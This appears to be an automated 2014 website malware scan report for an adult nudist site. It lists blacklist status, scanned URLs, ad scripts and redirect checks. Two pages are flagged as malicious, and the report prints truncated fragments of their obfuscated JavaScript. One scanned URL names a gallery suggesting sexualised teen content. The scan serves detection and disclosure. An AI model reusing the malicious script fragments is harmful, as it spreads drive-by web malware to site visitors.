Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=idealnude.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://idealnude.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://idealnude.com/ | 200 OK Content-Length: 17467 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: uncensored-films.com <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <script type="text/javascript"> <!-- document.cookie='te3b=bm9yZWZ8fGRlZmF1bHR8MXwwfDB8bm9uZXwwOg==; expires=Mon, 15 Sep 2014 19:45:36 GMT; path=/;'; document.cookie='te3bookmark=1410723936; expires=Mon, 14 Sep 2015 19:45:36 G ...[4459 bytes skipped]... | ||
http://ads.juicyads.com/jsclients/jac.js | 200 OK Content-Length: 91344 Content-Type: application/x-javascript | clean |
http://adspaces.ero-advertising.com/adspace/279281.js | 200 OK Content-Length: 4050 Content-Type: application/javascript | clean |
http://idealnude.com/t/out.php?l=100&id=nudist-naturist.net | HTTP/1.1 302 Found Connection: close Date: Sun, 14 Sep 2014 19:45:37 GMT Location: http://nudist-naturist.net Server: Apache Content-Length: 0 Content-Type: text/html Set-Cookie: x=6079.; expires=Sun, 14-Sep-2014 22:45:37 GMT; path=/ Set-Cookie: te3b=bm9yZWZ8fHwwfDF8MHxudWRpc3QtbmF0dXJpc3QubmV0fDE6bnVkaXN0LW5hdHVyaXN0Lm5ldA%3D%3D; expires=Mon, 15-Sep-2014 19:45:37 GMT; path=/ X-Powered-By: PHP/5.3.28 | clean |
http://nudist-naturist.net/ | 200 OK Content-Length: 34959 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: littlenudistworld.com <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <script type="text/javascript"> <!-- document.cookie='te3b=bm9yZWZ8fGRlZmF1bHR8MXwwfDB8bm9uZXwwOg==; expires=Mon, 15 Sep 2014 19:46:18 GMT; path=/;'; document.cookie='te3bookmark=1410723978; expires=Mon, 14 Sep 2015 19:46:18 GMT; path= ...[4443 bytes skipped]... | ||
http://pu.plugrush.com/4g6k.js | 200 OK Content-Length: 3544 Content-Type: text/javascript | clean |
http://idealnude.com/t/out.php?id=nudistlog.com | HTTP/1.1 302 Found Connection: close Date: Sun, 14 Sep 2014 19:45:39 GMT Location: http://nudistlog.com Server: Apache Content-Length: 0 Content-Type: text/html Set-Cookie: x=8792.; expires=Sun, 14-Sep-2014 22:45:39 GMT; path=/ Set-Cookie: te3b=bm9yZWZ8fHwwfDF8MHxudWRpc3Rsb2cuY29tfDE6bnVkaXN0bG9nLmNvbQ%3D%3D; expires=Mon, 15-Sep-2014 19:45:39 GMT; path=/ X-Powered-By: PHP/5.3.28 | clean |
http://nudistlog.com/ | 200 OK Content-Length: 65488 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: uncensored-films.com <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <script type="text/javascript"> <!-- document.cookie='te3b=bm9yZWZ8fGRlZmF1bHR8MXwwfDB8bm9uZXwwOg==; expires=Mon, 15 Sep 2014 19:45:40 GMT; path=/;'; document.cookie='te3bookmark=1410723940; expires=Mon, 14 Sep 2015 19:45:40 GMT; path= ...[4565 bytes skipped]... | ||
http://syndication.exoclick.com/splash.php?cat=143&idsite=135696&idzone=768625&login=oceanude&type=4 | 200 OK Content-Length: 4213 Content-Type: text/html | clean |
http://syndication.exoclick.com/test404page.js | 404 Not Found Content-Length: 564 Content-Type: text/html | clean |
http://gogousenet.com/tools/promo2.cgi?aid=1998309&cat=&group=23007014&cb=&var=ssssssssnssssssssnssssssssnssssssssnssssssss&target=_blank&show=0000&kw=Sex&lnk=set | 200 OK Content-Length: 11717 Content-Type: text/javascript | clean |
http://gogousenet.com/tools/promo2.cgi?aid=1998309&cat=&group=23006324&cb=&var=ssssssssnssssssssnssssssssnssssssssnssssssss&target=_blank&show=0000&kw=Sex&lnk=set | 200 OK Content-Length: 12922 Content-Type: text/javascript | clean |
http://syndication.exoclick.com/ads.php?type=300x250&login=oceanude&cat=139&search=&ad_title_color=0000cc&bgcolor=FFFFFF&border=0&border_color=000000&font=&block_keywords=&ad_text_color=000000&ad_durl_color=008000&adult=0&sub=0&text_only=0&show_thumb=0&idzone=738553&idsite=135696 | 200 OK Content-Length: 649 Content-Type: text/javascript | clean |
http://idealnude.com/t/out.php?id=anygalleries.com | HTTP/1.1 302 Found Connection: close Date: Sun, 14 Sep 2014 19:45:42 GMT Location: http://www.anygalleries.com/nudist.html?f=pure-nudist.com Server: Apache Content-Length: 0 Content-Type: text/html Set-Cookie: x=2815.; expires=Sun, 14-Sep-2014 22:45:42 GMT; path=/ Set-Cookie: te3b=bm9yZWZ8fHwwfDF8MHxhbnlnYWxsZXJpZXMuY29tfDE6YW55Z2FsbGVyaWVzLmNvbQ%3D%3D; expires=Mon, 15-Sep-2014 19:45:42 GMT; path=/ X-Powered-By: PHP/5.3.28 | clean |
http://www.anygalleries.com/nudist.html?f=pure-nudist.com | 200 OK Content-Length: 126675 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) document.cookie="st=visit"; var _0xa271=["\x62\x20\x33\x3D\x30\x2C\x35\x3D\x30\x2C\x36\x3D\x34\x2E\x63\x28\x22\x61\x22\x29\x3B\x34\x2E\x37\x3D\x22\x39\x3D\x38\x22\x3B\x36\x5B\x30\x5D\x2E\x64\x3D\x65\x28\x29\x7B\x35\x2B\x3D\x31\x3B\x66\x28\x35\x3E\x32\x26\x26\x33\x3D\x3D\x30\x29\x7B\x33\x3D\x31\x3B\x34\x2E\x37\x3D\x22\x68\x3D\x67\x22\x7D\x7D","\x7C","\x73\x70\x6C\x69\x74","\x7C\x7C\x7C\x5F\x73\x74\x7C\x64\x6F\x63\x75\x6D\x65\x6E\x74\x7C\x5F\x6B\x6D\x7C\x65\x6C\x7C\x63\x6F\x6F\x6B\x69\x65\x7C\x66\ Antivirus reports:
| ||
http://www.anygalleries.com/open.php?g=nudistgalleries&u=http%3A%2F%2Fwww.variousgalleries.com%2Fnudist%2Fimages.html%3Fgallery%3Dteentitties&i=1205-1-s | HTTP/1.1 302 Found Connection: close Date: Sun, 14 Sep 2014 19:45:37 GMT Location: http://www.variousgalleries.com/nudist/images.html?gallery=teentitties Server: Apache/2.2.15 (CentOS) Content-Length: 8 Content-Type: text/html; charset=UTF-8 Set-Cookie: trace= Set-Cookie: trace=%7Csys_contenturl%7Enudistgalleries%7C; expires=Mon, 15-Sep-2014 19:45:37 GMT Set-Cookie: clickday= Set-Cookie: clickday=1; expires=Tue, 16-Sep-2014 19:45:37 GMT Set-Cookie: clickall= Set-Cookie: clickall=1; expires=Mon, 14-Sep-2015 19:45:37 GMT X-Powered-By: PHP/5.3.3 | clean |
http://www.variousgalleries.com/nudist/images.html?gallery=teentitties | 200 OK Content-Length: 11689 Content-Type: text/html | clean |
http://www.variousgalleries.com/gallery.js | 200 OK Content-Length: 9183 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var error=0;
var subscribe_video=""; var relif_tred = new Array(0,0,0,0,0,0,0,0,0,0,0); function Request (name) { var pname = name + '='; var ps = window.location.search; if (typeof(request_bypass)!="undefined") { if (request_bypass==1) { return "request_bypassed"; } } if (ps.length > 0) { var start = ps.indexOf (pname); if (start != -1) { start += pname.length; var { var pfix; if (i<10) { pfix=name+"-00"; } else if (i<100) { pfix=name+"-0"; } else { pfix=name+"-";} var out=pfix+i; var mx=c % m; var sk=i % skip; if (sk!=0) { document.write ("<img src=http://www.l7cos.com/screenlists/"+name+"/"+out+".jpg width="+w+" height="+h+" alt='Video screen list'>"); if (mx==0) { document.write ("<br>"); } c++; } } } Antivirus reports:
| ||
http://www.anygalleries.com/../open.php?g=nudist&l=1&s=n&p=100&u=http%3A%2F%2Fwww.showgalleries.com%2Ftraffic.php%3Ff%3Dgallery_thumbs%26g%3Dnudist | 400 Bad Request Content-Length: 312 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: idealnude.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 14 Sep 2014 19:45:36 GMT
Server: Apache
Content-Type: text/html
X-Powered-By: PHP/5.3.28
GET / HTTP/1.1
Host: idealnude.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 14 Sep 2014 19:45:36 GMT
Server: Apache
Content-Type: text/html
X-Powered-By: PHP/5.3.28
Second query (visit from search engine):
GET / HTTP/1.1
Host: idealnude.com
Referer: http://www.google.com/search?q=idealnude.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: idealnude.com
Referer: http://www.google.com/search?q=idealnude.com
Result:
The result is similar to the first query. There are no suspicious redirects found.